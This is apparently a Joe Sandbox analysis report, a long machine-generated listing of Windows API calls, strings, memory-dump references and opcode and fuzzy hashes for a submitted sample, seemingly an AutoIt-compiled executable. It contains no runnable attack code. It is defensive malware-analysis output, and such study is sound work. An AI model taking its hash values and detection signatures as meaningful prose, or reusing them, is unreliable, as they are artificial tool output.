                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: b42ebf86d73a84a330b7cfba52e15c5627dd27ed22a5a36d81b74b1901335152
                                                                            • Instruction ID: 191a94f283fbe38e404343dceecdc587ec551ce62c02ce7fdaeb940ddab53355
                                                                            • Opcode Fuzzy Hash: b42ebf86d73a84a330b7cfba52e15c5627dd27ed22a5a36d81b74b1901335152
                                                                            • Instruction Fuzzy Hash: 9D217CB2104209ABCB038F94DD89FAE7BADAF44304F144055FA41A21A1C3768D21EB61
                                                                            APIs
                                                                              • Part of subcall function 0031AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                              • Part of subcall function 0031AF83: BeginPath.GDI32(?), ref: 0031B009
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0036EC20
                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0036EC34
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0036EC42
                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0036EC52
                                                                            • EndPath.GDI32(00000000), ref: 0036EC62
                                                                            • StrokePath.GDI32(00000000), ref: 0036EC72
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 605d72723c94919b24a5bcf0816a91d5ac50b9777922e5f1c11815ec2b597fc0
                                                                            • Instruction ID: dead0611d332557ab858e67008523a9d41f57d1c3b5ec96291407d858c28b2ea
                                                                            • Opcode Fuzzy Hash: 605d72723c94919b24a5bcf0816a91d5ac50b9777922e5f1c11815ec2b597fc0
                                                                            • Instruction Fuzzy Hash: 021109B6000249BFEF129F90DC88EEA7F6DEF08350F048152FE08991A1D7719D65DBA0
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0033E1C0
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0033E1D1
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0033E1D8
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0033E1E0
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0033E1F7
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0033E209
                                                                              • Part of subcall function 00339AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00339A05,00000000,00000000,?,00339DDB), ref: 0033A53A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                                                            • String ID:
                                                                            • API String ID: 603618608-0
                                                                            • Opcode ID: 613e24425f704ea109b29be3cbad1a7fcc6bf514b907f0ee829f744977220cc0
                                                                            • Instruction ID: fef3a3ba7ad6b8fdbfbd1d5c0a5246950dc69f363f59ea6676c6912c59caa2a2
                                                                            • Opcode Fuzzy Hash: 613e24425f704ea109b29be3cbad1a7fcc6bf514b907f0ee829f744977220cc0
                                                                            • Instruction Fuzzy Hash: F30171B5A00319BBEB119BA59C45B5ABFA8EB48351F004066EA04A72D0D6709C008B60
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 00327B47
                                                                              • Part of subcall function 0032123A: __initp_misc_winsig.LIBCMT ref: 0032125E
                                                                              • Part of subcall function 0032123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00327F51
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00327F65
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00327F78
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00327F8B
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00327F9E
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00327FB1
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00327FC4
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00327FD7
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00327FEA
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00327FFD
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00328010
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00328023
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00328036
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00328049
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0032805C
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0032806F
                                                                            • __mtinitlocks.LIBCMT ref: 00327B4C
                                                                              • Part of subcall function 00327E23: InitializeCriticalSectionAndSpinCount.KERNEL32(003BAC68,00000FA0,?,?,00327B51,00325E77,003B6C70,00000014), ref: 00327E41
                                                                            • __mtterm.LIBCMT ref: 00327B55
                                                                              • Part of subcall function 00327BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00327B5A,00325E77,003B6C70,00000014), ref: 00327D3F
                                                                              • Part of subcall function 00327BBD: _free.LIBCMT ref: 00327D46
                                                                              • Part of subcall function 00327BBD: DeleteCriticalSection.KERNEL32(003BAC68,?,?,00327B5A,00325E77,003B6C70,00000014), ref: 00327D68
                                                                            • __calloc_crt.LIBCMT ref: 00327B7A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00327BA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 2942034483-0
                                                                            • Opcode ID: a634230f4416caf81eea4eb84bf1f1abd6ac459470c17f2aea20266fb2044f5f
                                                                            • Instruction ID: dd1f2d1cd1d3309a75bd41cb412e2c24aa4334e139264d636f329dc1bcb6815e
                                                                            • Opcode Fuzzy Hash: a634230f4416caf81eea4eb84bf1f1abd6ac459470c17f2aea20266fb2044f5f
                                                                            • Instruction Fuzzy Hash: ACF0903210D73219E62777757C4BA4A2AC4BF01734F220699F860CD1D2FF2188414170
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0030281D
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00302825
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00302830
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0030283B
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00302843
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0030284B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: a80b91acd22902c10ee425087d6c40b42d5894b7d4ab6f3b62af584bb4bd84c6
                                                                            • Instruction ID: eb1081e17794b1617f145c8023ca0308c86ace9826c72ef87733a3dcba3cbaec
                                                                            • Opcode Fuzzy Hash: a80b91acd22902c10ee425087d6c40b42d5894b7d4ab6f3b62af584bb4bd84c6
                                                                            • Instruction Fuzzy Hash: 02016CB0901B5D7DE3008F6A8C85B52FFA8FF15354F00415B915C47941C7F5A864CBE5
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 1423608774-0
                                                                            • Opcode ID: 11a61955bf8341509f062ebf875951574cb51deed202b6e89cb14a96aaaf71de
                                                                            • Instruction ID: 85b8297978b84ac027514cb03004f177a6b6c1f1f69918f6e0368bddb043e57e
                                                                            • Opcode Fuzzy Hash: 11a61955bf8341509f062ebf875951574cb51deed202b6e89cb14a96aaaf71de
                                                                            • Instruction Fuzzy Hash: DF018136142311ABDB172B54EC48EEB77BEFF88711F0509AAF5039A1E0DB64E800DB50
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00347C07
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00347C1D
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00347C2C
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C3B
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C45
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C4C
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 5904a18650ae574eeeb031b0ec9c547f4c01f7b49f683855e251a1050d4db13c
                                                                            • Instruction ID: 7aaddd74fcc4a8edf1ce29b9956ca64991af226b9313cd22ef81abd4e7758763
                                                                            • Opcode Fuzzy Hash: 5904a18650ae574eeeb031b0ec9c547f4c01f7b49f683855e251a1050d4db13c
                                                                            • Instruction Fuzzy Hash: EDF03A76241258BBE7225B529C0EEEF7BBCEFC6B21F000098FA01D1091E7A05E41C7B5
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00349A33
                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A44
                                                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A51
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A5E
                                                                              • Part of subcall function 003493D1: CloseHandle.KERNEL32(?,?,00349A6B,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 003493DB
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00349A71
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A78
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 8a9c4bbdf38cb772ba64e1bd0828fee4ec84553013b44bd4a7eab3bcb7a452e3
                                                                            • Instruction ID: d3d3a7ad0be30894422aa162805f49bb4df72efcdd4b19e2a97cdbd0b6ae9ba8
                                                                            • Opcode Fuzzy Hash: 8a9c4bbdf38cb772ba64e1bd0828fee4ec84553013b44bd4a7eab3bcb7a452e3
                                                                            • Instruction Fuzzy Hash: D6F05E36141311ABD7532BA4EC8DEAB777EFF85311F1508A6F503950E0DBB5A901DB50
                                                                            APIs
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • __swprintf.LIBCMT ref: 00301EA6
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00301D49
                                                                            Similarity
                                                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 2125237772-557222456
                                                                            • Opcode ID: 38fd4b651ff7e0accfc99e59de1b1fe4d0229fe802b52b4fdfbedaff8eb9538a
                                                                            • Instruction ID: 5153e8293d99aebc7c88212859e5ccd6c81991705d7b4d61638db0148344b160
                                                                            • Opcode Fuzzy Hash: 38fd4b651ff7e0accfc99e59de1b1fe4d0229fe802b52b4fdfbedaff8eb9538a
                                                                            • Instruction Fuzzy Hash: 36917A711152019FC726EF25C8A6C6FB7E8AF85700F01492DF9899B2E1DB71EE04CB92
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0035B006
                                                                            • CharUpperBuffW.USER32(?,?), ref: 0035B115
                                                                            • VariantClear.OLEAUT32(?), ref: 0035B298
                                                                              • Part of subcall function 00349DC5: VariantInit.OLEAUT32(00000000), ref: 00349E05
                                                                              • Part of subcall function 00349DC5: VariantCopy.OLEAUT32(?,?), ref: 00349E0E
                                                                              • Part of subcall function 00349DC5: VariantClear.OLEAUT32(?), ref: 00349E1A
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: 2864da56ef35a27055418d095d620e73c1854c162cc2793a511e989928ac303d
                                                                            • Instruction ID: 635a5c19e433353a6e36e81d3d86b3b4e5eff93c1ee3a9734ae91b40a4f59ba4
                                                                            • Opcode Fuzzy Hash: 2864da56ef35a27055418d095d620e73c1854c162cc2793a511e989928ac303d
                                                                            • Instruction Fuzzy Hash: E8916C746083019FCB12DF24C491D5AF7F8AF89704F04496DF89A9B3A2DB31E949CB52
                                                                            APIs
                                                                              • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
                                                                            • _memset.LIBCMT ref: 00345438
                                                                            • GetMenuItemInfoW.USER32(?), ref: 00345467
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00345513
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0034553D
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: 2aaa6c6c48bea98bff0ebb2f24c33de7583f14ba3744bbcc73b9483af8469cb2
                                                                            • Instruction ID: 17d8f950e19f8d8b59aa671fc9c3ba5389f69d91eaa99e738d72b1977367796d
                                                                            • Opcode Fuzzy Hash: 2aaa6c6c48bea98bff0ebb2f24c33de7583f14ba3744bbcc73b9483af8469cb2
                                                                            • Instruction Fuzzy Hash: DD51F172A047019BD7179F28C841BBBB7E8AB86710F05062DF896DF2D3DB60ED448B52
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0034027B
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003402B1
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003402C2
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00340344
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: a4e5c673b6ebb75424744263c5222d63fa296b72657af13013dd31ba09bab3f4
                                                                            • Instruction ID: c10c5cf3aa068c1170b7f271ebb9c8d4c77c93d5358357238f917bb3f0336d3e
                                                                            • Opcode Fuzzy Hash: a4e5c673b6ebb75424744263c5222d63fa296b72657af13013dd31ba09bab3f4
                                                                            • Instruction Fuzzy Hash: C8415C75600204EFDB4ADF64C884B9A7BF9EF44314F1580A9EE09DF246D7B1E944CBA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00345075
                                                                            • GetMenuItemInfoW.USER32 ref: 00345091
                                                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003450D7
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003C1708,00000000), ref: 00345120
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: b887ed780106e08c3834b6f20acd8d484e15d373ce2e708d19649b50e61f58c7
                                                                            • Instruction ID: a5da8b09cbb8c381fbdb597e474ae51ad5482f9104b8c731f2ae61752ffa8479
                                                                            • Opcode Fuzzy Hash: b887ed780106e08c3834b6f20acd8d484e15d373ce2e708d19649b50e61f58c7
                                                                            • Instruction Fuzzy Hash: 9341D235605741AFDB22DF24D880B2AB7E8AF89724F044A5EF8559F2D2D730F800CB62
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0034E742
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0034E768
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0034E78D
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0034E7B9
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID: p1v`Kv
                                                                            • API String ID: 3321077145-2864719405
                                                                            • Opcode ID: 038c97af13621eda8d2a817865a8798b6b5cfe2f59a4cf8829fea829b4e5ea0d
                                                                            • Instruction ID: 6007a25db8d81f85887f1624bb8a7a93f2e27952db3c2d77e295f0414b8b0f4d
                                                                            • Opcode Fuzzy Hash: 038c97af13621eda8d2a817865a8798b6b5cfe2f59a4cf8829fea829b4e5ea0d
                                                                            • Instruction Fuzzy Hash: 80411339600610DFCB12EF55C454A4DBBE6BF99720F098499E986AF3A2CB74FD40CB91
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00360587
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 2358735015-567219261
                                                                            • Opcode ID: b92a19156fed1637c880fde7257204314ef62fab57482eb20a6dfd7608e6f0db
                                                                            • Instruction ID: 9b11d7c52a38d70a3ae126aea4f0eb054aebe9d09efe2d8a891b466e996aa83f
                                                                            • Opcode Fuzzy Hash: b92a19156fed1637c880fde7257204314ef62fab57482eb20a6dfd7608e6f0db
                                                                            • Instruction Fuzzy Hash: CB31C17050021AAFCF0AEF64CC529EFB3B4FF54314B008629E826AB6D5DB71E955CB80
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0033B88E
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0033B8A1
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 0033B8D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3850602802-1403004172
                                                                            • Opcode ID: 6137d0654229acb454beb5975942ef0e882319630f647754eabdccb15850255f
                                                                            • Instruction ID: c96e08119ad133a521d49f8a8b786997118098daea15d85638ec9e971c7e513a
                                                                            • Opcode Fuzzy Hash: 6137d0654229acb454beb5975942ef0e882319630f647754eabdccb15850255f
                                                                            • Instruction Fuzzy Hash: 6A21E5B1A00208BFDB06AB64D896DFFB77CDF05354F104229F521AB1E1DB744D069760
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00354401
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00354427
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00354457
                                                                            • InternetCloseHandle.WININET(00000000), ref: 0035449E
                                                                              • Part of subcall function 00355052: GetLastError.KERNEL32(?,?,003543CC,00000000,00000000,00000001), ref: 00355067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 1951874230-3916222277
                                                                            • Opcode ID: 42e162c4940211fb774bab25605ad650b2aaf0b4a190ea46dd5fa6549f90adcc
                                                                            • Instruction ID: bfa89ea864911f682f150461b63e225a3870a80ac3f419e2e747b2ff1c8dc0cc
                                                                            • Opcode Fuzzy Hash: 42e162c4940211fb774bab25605ad650b2aaf0b4a190ea46dd5fa6549f90adcc
                                                                            • Instruction Fuzzy Hash: 2E21FFB2140208BFE7179F55CC81FBFB7FCEB48759F10801AF909961A0EA648D499770
                                                                            APIs
                                                                              • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                              • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                              • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0036915C
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00369163
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00369178
                                                                            • DestroyWindow.USER32(?), ref: 00369180
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 4e37fd825ac7e569557312daee60461753d365d7b22853d556639ffa7b377de7
                                                                            • Instruction ID: 8fa4402ae921abf1b8e00bdcac77488e0f90f1be435a1ebf913bdaa20482eb4e
                                                                            • Opcode Fuzzy Hash: 4e37fd825ac7e569557312daee60461753d365d7b22853d556639ffa7b377de7
                                                                            • Instruction Fuzzy Hash: AF21CF7120020ABBEF124F64DC84FBA37ADEF9A364F21825AF950961D4C775DC41A760
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00349588
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003495B9
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003495CB
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00349605
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
